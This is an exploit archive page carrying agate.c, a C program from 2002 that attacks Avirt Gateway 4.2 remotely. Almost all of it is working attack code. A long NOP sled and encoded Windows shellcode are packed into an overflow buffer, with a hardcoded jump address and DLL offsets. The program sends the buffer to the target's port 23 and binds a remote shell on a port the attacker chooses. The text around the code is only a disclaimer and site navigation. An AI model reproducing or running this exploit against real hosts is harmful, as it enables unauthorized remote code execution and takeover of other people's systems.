exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

agate.c

agate.c
Posted Feb 19, 2002
Authored by uid0x00

Avirt Gateway 4.2 remote exploit.

tags | exploit, remote
SHA-256 | c7c71b607fa45cf484a658d01ea6310238e1dd14cda3695bca1c9028168cf405

agate.c

Change Mirror Download
/* agate.c by uid0x00
* Avirt Gateway 4.2 remote exploit
* compile with gcc agate.c -o agate
*
* thx to ByteRage, exploit is based on his shellcode
*
*Disclaimer:
*Use of this information constitutes acceptance for use in an AS IS condition. There are
*NO warranties with regard to this information. In no event shall the author
*be liable for any damages whatsoever arising out of or in connection with
*the use or spread of this information. Any use of this information is at the
*user's own risk.
*/

/* Set the following three defines according to the DLL we use */

// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
int s;
struct sockaddr_in SockAdr;
char exploit[1024];
unsigned short int a_port;

char shellcode[] =

/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";

/* ==== SHELLC0DE ENDS ==== */

printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");

if(argc < 3) {
printf("usage:\t%s <ip#> <port#>\n", argv[0]);
return 0;
}

//insert shell port
a_port = htons(atoi(argv[2]));
a_port^= 0x9999;
shellcode[964] = (a_port) & 0xff;
shellcode[965] = (a_port >> 8) & 0xff;

//init the exploit buffer
memset(&exploit, '\xCC', 0x200);
memcpy(&exploit, &shellcode, sizeof(shellcode)-1);

printf("initialising socket\n");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (s) {
printf("...initialized\n");

memset(&SockAdr, 0, sizeof(SockAdr));
SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
SockAdr.sin_family = AF_INET;
SockAdr.sin_port = htons(23);

printf("trying to connect\n");
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
printf("...connected\n");
printf("(waiting)\n");
sleep(3);

printf("sending exploit\n");
send(s, exploit, sizeof(exploit), 0);
printf("...sent\n");

printf("(waiting)\n");
sleep(3);

printf("...closed\nshell bound to port %s \n", argv[2]);
close(s);
}
else {
printf("... failed :( errno = %i\n", errno);
close(s);
return(0);
}
}
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close